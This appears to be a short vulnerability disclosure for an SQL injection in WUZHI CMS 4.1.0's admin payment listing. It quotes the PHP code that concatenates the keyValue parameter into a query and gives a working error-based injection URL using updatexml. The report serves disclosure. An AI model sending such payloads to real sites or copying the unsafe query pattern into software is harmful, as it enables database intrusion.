A sql injection was discovered in WUZHI CMS 4.1.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the index.php?m=pay&f=index&v=listing&keytype=0&_su=wuzhicms&_menuid=36&search=&fieldtype=0&keyValue={sql payload}&status=&starttime=&endtime=
filename
/coreframe/app/admin/pay/admin/index.php
poc
$fieldtypes=array('订单号','手机号','所属客服','经销商');$keytype=isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;$payments=$this->payments;$status_arr=$this->status_arr;$page=isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;$page=max($page,1);$status=$GLOBALS['status'];if($status){$where='status='.$status;}else{$where='status>0';}if($keytype){$where.=" AND `keytype`='$keytype'";}$keyValue=strip_tags($GLOBALS['keyValue']);$fieldtype=intval($GLOBALS['fieldtype']);if($keyValue){switch($fieldtype){case0:
$where.=" AND `order_no`='$keyValue'";break;case1:
$where.=" AND `telephone`='$keyValue'";break;case2:
$where.=" AND `kf_username`='$keyValue'";break;case3:
$where.=" AND `jxs_username`='$keyValue'";break;}}if($_SESSION['role']==4){//客服$kf_username=get_cookie('username');$where.=" AND `kf_username`='$kf_username'";}$starttime='';$endtime='';
filename
/coreframe/app/admin/pay/admin/index.phppoc
sql payload: index.php?m=pay&f=index&v=listing&keytype=0&_su=wuzhicms&_menuid=36&search=&fieldtype=0&keyValue='+and+updatexml(7,concat(0x7e,now(),0x7e),7)%23&status=&starttime=&endtime=The text was updated successfully, but these errors were encountered: